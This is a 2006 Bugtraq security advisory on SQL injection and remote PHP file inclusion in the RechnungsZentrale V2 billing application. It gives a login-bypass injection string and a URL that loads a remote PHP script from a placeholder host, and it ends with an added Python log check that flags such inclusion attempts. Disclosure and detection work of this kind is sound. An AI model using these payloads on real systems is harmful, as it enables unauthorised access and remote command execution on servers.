Message-ID: <20060419074003.20967.qmail@securityfocus.com>
Date: 19 Apr 2006 07:40:03 -0000
From: info@....org
To: bugtraq@...urityfocus.com
Subject: RechnungsZentrale V2 - SQL injection and Remote PHP inclusion
 vulnerabilities


    ----------------------------------------------------------------------------------
    - GroundZero Security Research and Software Development 2006                     - 
    ----------------------------------------------------------------------------------
    -                                                                                -
    -  Security Advisory regarding RechnungsZentrale v2.                             -
    -  SQL Injection and Remote File inclusion Vulnerabilities.                      -
    -  Released: Tue Apr 18 18:00:00 CEST 2006                                       -
    -                                                                                -
    ----------------------------------------------------------------------------------



    ----------------------------------------------------------------------------------
    - Affected:                                                                      -
    ----------------------------------------------------------------------------------

    Software:	RechnungsZentrale V2
    Version:	1.1.3, likely older versions are affected as well.
    Vendor: 	http://www.nfec.de/


    ----------------------------------------------------------------------------------
    - Information:                                                                   -
    ----------------------------------------------------------------------------------

    "RechnungsZentrale V2 is a multiuser, Web-based billing application. 
     It facilitates the creation of bills and the management of customers. 
     It is written in PHP and uses MySQL. It supports German, English, French, 
     and Dansk languages."

    The Software contains vulnerabilities which allow an Attacker to conduct
    SQL injection and Remote File inclusion Attacks prior to Authentication.

    The SQL injection vulnerability exists in the login script (authent.php4) and 
    allows an Attacker to log into the internal Interface or execute malicious 
    SQL commands.

    PoC:
    	User: ' OR '1'='1
    	Password: 1


    In the same script it is possible to include a remote PHP file by pointing the 
    "rootpath=" parameter to a remote PHP script that calls system() or passthru().
   
    Doing so would allow an unauthenticated Attacker to execute shell commands with 
    permissions of the Web Server. 

    PoC: 
	http://www.victim.tld/mod/authent.php4?rootpath=Http://server.tld/mod/db.php4


    ----------------------------------------------------------------------------------
    - Vendor Response:                                                               -
    ----------------------------------------------------------------------------------

    Notified: 	Tue Apr 18 16:12:14 CEST 2006
    Response: 	Tue Apr 18 17:13:14 CEST 2006 
	      	(Development Discontinued)
    Disclosure:	Tue Apr 18 18:00:00 CEST 2006


    ----------------------------------------------------------------------------------
    - Bugs discovered by GroundZero Security Research and Software Development       -
    - http://www.GroundZero-Security.com | Http://www.g-0.org                        -
    ----------------------------------------------------------------------------------
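
Added example, not part of the original advisory or of the vendor's code: a log check that flags requests whose "rootpath" parameter names a remote target, as in the inclusion PoC above. The log lines, client addresses and the function name find_remote_rootpath are constructed for illustration; the combined log format is an assumption about the web server.

```python
import re
from urllib.parse import urlsplit, parse_qs

# Constructed sample access-log lines; addresses and hosts are placeholders.
SAMPLE_LOG = """\
192.0.2.10 - - [19/Apr/2006:09:01:12 +0200] "GET /mod/authent.php4 HTTP/1.1" 200 1834
192.0.2.44 - - [19/Apr/2006:09:02:40 +0200] "GET /mod/authent.php4?rootpath=Http://server.tld/mod/db.php4 HTTP/1.1" 200 512
192.0.2.44 - - [19/Apr/2006:09:02:55 +0200] "GET /mod/authent.php4?rootpath=%68ttp%3A%2F%2Fserver.tld%2Fx HTTP/1.1" 200 498
192.0.2.17 - - [19/Apr/2006:09:03:10 +0200] "GET /mod/authent.php4?rootpath=../ HTTP/1.1" 200 1834
192.0.2.17 - - [19/Apr/2006:09:04:00 +0200] "GET /index.php4?lang=en HTTP/1.1" 200 2210
"""

# Client address and request target from a combined-log-format line.
REQUEST = re.compile(r'^(\S+) \S+ \S+ \[[^\]]+\] "(?:GET|POST|HEAD) (\S+) [^"]*"')
# A value starting with a URL scheme (any letter case) or a data: URI
# is a remote or wrapper target rather than a local directory.
REMOTE = re.compile(r'^\s*(?:[a-z][a-z0-9+.\-]*://|data:)', re.IGNORECASE)


def find_remote_rootpath(log_text, param="rootpath"):
    """Return (client, decoded value) for requests whose `param` is remote."""
    hits = []
    for line in log_text.splitlines():
        m = REQUEST.match(line)
        if not m:
            continue  # not a request line in the expected format
        client, target = m.groups()
        # parse_qs percent-decodes values, so encoded schemes are compared
        # in the same form the application would receive them.
        query = parse_qs(urlsplit(target).query, keep_blank_values=True)
        for value in query.get(param, []):
            if REMOTE.match(value):
                hits.append((client, value))
    return hits


if __name__ == "__main__":
    for client, value in find_remote_rootpath(SAMPLE_LOG):
        print(f"{client} rootpath -> {value}")
```

Only the query string is inspected, so a "rootpath" value sent in a POST body would need the same check applied at the application or WAF layer.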

